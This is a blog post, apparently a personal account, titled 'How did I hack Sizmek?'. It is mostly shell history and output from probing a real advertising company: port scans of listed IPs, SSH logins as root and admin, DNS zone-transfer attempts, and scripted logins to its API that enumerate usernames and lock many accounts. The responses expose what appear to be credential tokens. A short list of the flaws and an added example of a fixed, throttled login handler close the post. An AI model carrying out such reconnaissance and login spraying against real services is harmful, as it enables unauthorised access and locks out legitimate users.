How did I hack Sizmek? (an Amazon company)

wpscan --url https://www.sizmek.com/ --api-token <KEY> --random-user-agent --plugins-detection mixed
9114 dig sizmek.com
9115 nmap -F 198.199.123.66
9116 ssh root@198.199.123.66
9117 ssh admin@198.199.123.66
9118 ssh admin2@198.199.123.66
9119 ssh smith@198.199.123.66
9120 ssh beta@198.199.123.66
9121 ssh sizmek@198.199.123.66
9122 ssh admin@198.199.123.66
9123 ssh root@198.199.123.66
9124 nmap -F 198.199.123.66
9125 nmap -p- 198.199.123.66
9126 nmap -p 1-65535 -sV -sS -T4 198.199.123.66
9127 sudo nmap -p 1-65535 -sV -sS -T4 198.199.123.66
9128 host -l eyeblaster.com
9129 dig eyeblaster
9130 dig eyeblaster.com
9131 dig eyeblaster.com soa
9132 dig @ns.SOA.com eyeblaster.com axfr
9133 host -l sizmek.com
9134 dig sizmek.com
9135 dig sizmek.com soa
9136 nmap -F 104.17.73.206
9137 ssh root@104.17.73.206
9138 nmap -F 104.16.53.111
9139 nmap -F 54.237.40.242
9140 nmap -F 52.200.78.174
9141 nmap -F 206.16.132.28
9142 nmap -F 206.16.132.45
9143 nmap -F 206.16.132.59
9144 nmap -F 52.97.133.200
9145 nmap -F 62.128.59.21
9146 nmap -F 64.94.191.173
9147 nmap -F 64.94.191.184
9148 nmap -F 82.80.14.222
9149 nmap -F 82.80.14.250
9152 nmap -F 104.19.154.83
9153 nmap -F 104.72.166.160
9154 nmap -F 206.16.132.28
9155 nmap -F 206.16.132.41
9156 nmap -F 206.16.132.59
9157 nmap -F 216.58.210.211
9158 nmap -F 62.128.59.21
$ nmap -F 62.128.59.21
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-20 22:21 +03
Nmap scan report for panecovps01.spd.co.il (62.128.59.21)
Host is up (0.12s latency).
Not shown: 96 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
443/tcp open https
445/tcp open microsoft-ds
$ nmap -F 82.80.14.250
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-20 22:17 +03
Nmap scan report for bzq-80-14-250.red.bezeqint.net (82.80.14.250)
Host is up (0.095s latency).
Not shown: 97 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp closed https
9271 sudo nmap -v -p 1-65535 -sV -sT -T4 62.128.59.21
9272 sudo nmap -v -p 1-65535 -sV -sT -T4 82.80.14.250
9273 sudo nmap -v -p 1-65535 -sV -sT -T4 52.200.78.174
9274 sudo nmap -v -p 1-65535 -sV -sT -T4 54.237.40.242
9277 sudo nmap -v -p 1-65535 -sV -sT -T4 104.196.113.33
https://adapi.uat.sizmek.com/sas/login/login
https://api.sizmek.com/rest/login/login/
https://adapi.sizmek.com/sas/login/login/
curl -X POST \
https://api.sizmek.com/rest/login/login \
-H 'cache-control: no-cache' \
-H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
-H 'postman-token: 9cfe13ad-2fa3-2124-1b6e-e4cbb676a483' \
-F username=admin
curl -X POST \
https://api.sizmek.com/rest/login/login \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'cache-control: no-cache' \
-H 'postman-token: 88cd04ad-99c5-7a0f-6e85-02d5b4063203' \
-d '{
"username": "admin",
"password": "asd"
}'
{'error': 'Credentials Expired, KgS1hrBsQ5lI_ry5'}
{'error': 'User with the specified username does not exist'}
02: {'error': 'Token Not Valid'}
demo: {'error': 'Token Not Valid'}
partners: {'error': 'Token Not Valid'}
compras: {'error': 'Token Not Valid'}
admin: {'error': 'Credentials Expired, A8TooKGXYaBpYz2f'}
connect: {'error': 'Token Not Valid'}
miami: {'error': 'Token Not Valid'}
mickey: {'error': 'Token Not Valid'}
affiliate: {'error': 'Token Not Valid'}
affiliates: {'error': 'Token Not Valid'}
internal: {'error': 'Token Not Valid'}
mw: {'error': 'Token Not Valid'}
lima: {'error': 'Token Not Valid'}
tango: {'error': 'Token Not Valid'}
td: {'error': 'Token Not Valid'}
bw: {'error': 'Token Not Valid'}
cd: {'error': 'User [cd] last login attempt before locking user account'}
partners: {'error': 'Token Not Valid'}
compras: {'error': 'Token Not Valid'}
admin: {'error': 'Credentials Expired, KgS1hrBsQ5lI_ry5'}
connect: {'error': 'Token Not Valid'}
miami: {'error': 'Token Not Valid'}
mickey: {'error': 'Token Not Valid'}
affiliate: {'error': 'Token Not Valid'}
affiliates: {'error': 'Token Not Valid'}
internal: {'error': 'Token Not Valid'}
vu: {'error': 'Token Not Valid'}
stronghold: {'error': 'Token Not Valid'}
lima: {'error': 'Token Not Valid'}
tango: {'error': 'Token Not Valid'}
td: {'error': 'Token Not Valid'}
bw: {'error': 'Token Not Valid'}
regs: {'error': 'Token Not Valid'}
cd: {'error': 'User [cd] account is locked'}
cd: {'error': 'User [cd] account is locked'}
partners: {'error': 'User [Partners] account is locked'}
affiliate: {'error': 'User [affiliate] account is locked'}
affiliates: {'error': 'User [affiliates] account is locked'}
compras: {'error': 'User [Compras] account is locked'}
internal: {'error': 'User [internal] account is locked'}
connect: {'error': 'User [Connect] account is locked'}
miami: {'error': 'User [miami] account is locked'}
mickey: {'error': 'User [mickey] account is locked'}
lima: {'error': 'User [lima] account is locked'}
tango: {'error': 'User [Tango] account is locked'}
td: {'error': 'User [TD] account is locked'}
bw: {'error': 'User [bw] account is locked'}
  • They are exposing whether or not a username exists in the database.
  • Locking the account after N failed attempts is a stupid idea. Generally C# and Java developers tend to think that it’s a good idea but in reality, it’s not. You should rather temporarily ban the IP address instead of locking the account.
  • Even though I did not have the api-key, the logic in their server-side implementation counts my requests as login attempts. Therefore the accounts are getting locked.
  • Their API (at least the login endpoint) has neither a rate limit nor throttling.
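A login handler that fixes the three problems above: one generic error whether or not the user exists, per-IP throttling instead of an account lock, and no attempt counted for a request that carries no valid API key. This is an added illustration, not Sizmek's code; the users, API keys, thresholds and the in-memory counter are made-up sample values.

```python
import hashlib
import hmac
import time
from collections import defaultdict

# Constructed sample data (hypothetical; not from the real service).
API_KEYS = {"k-demo-key"}
# Demo only: sha256 stands in for a real password hash such as argon2/bcrypt.
USERS = {"admin": hashlib.sha256(b"correct horse battery staple").hexdigest()}
DUMMY_HASH = hashlib.sha256(b"dummy").hexdigest()  # equalises work for unknown users

GENERIC_ERROR = {"error": "Invalid credentials"}   # same body for unknown user and wrong password
MAX_FAILURES = 5          # failed attempts allowed per source IP ...
WINDOW_SECONDS = 60       # ... within this sliding window


class LoginService:
    def __init__(self, now=time.monotonic):
        self.now = now                        # injectable clock, handy for tests
        self.attempts = defaultdict(list)     # source IP -> timestamps of failed attempts

    def _throttled(self, ip):
        cutoff = self.now() - WINDOW_SECONDS
        recent = [t for t in self.attempts[ip] if t > cutoff]
        self.attempts[ip] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, ip, api_key, username, password):
        # 1. A request without a valid API key is rejected before any
        #    bookkeeping, so it can never contribute to a lockout.
        if api_key not in API_KEYS:
            return 401, {"error": "Token Not Valid"}
        # 2. Throttle by source IP; the account itself is never locked,
        #    so a legitimate user on another IP is unaffected.
        if self._throttled(ip):
            return 429, {"error": "Too many attempts, try again later"}
        # 3. Same code path, same response and same hashing work whether
        #    or not the username exists.
        stored = USERS.get(username, DUMMY_HASH)
        supplied = hashlib.sha256(password.encode()).hexdigest()
        ok = hmac.compare_digest(stored, supplied) and username in USERS
        if not ok:
            self.attempts[ip].append(self.now())
            return 401, GENERIC_ERROR
        return 200, {"status": "ok"}
```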

Why did I hack Sizmek?

mertyildiran.com

M. Mert Yıldıran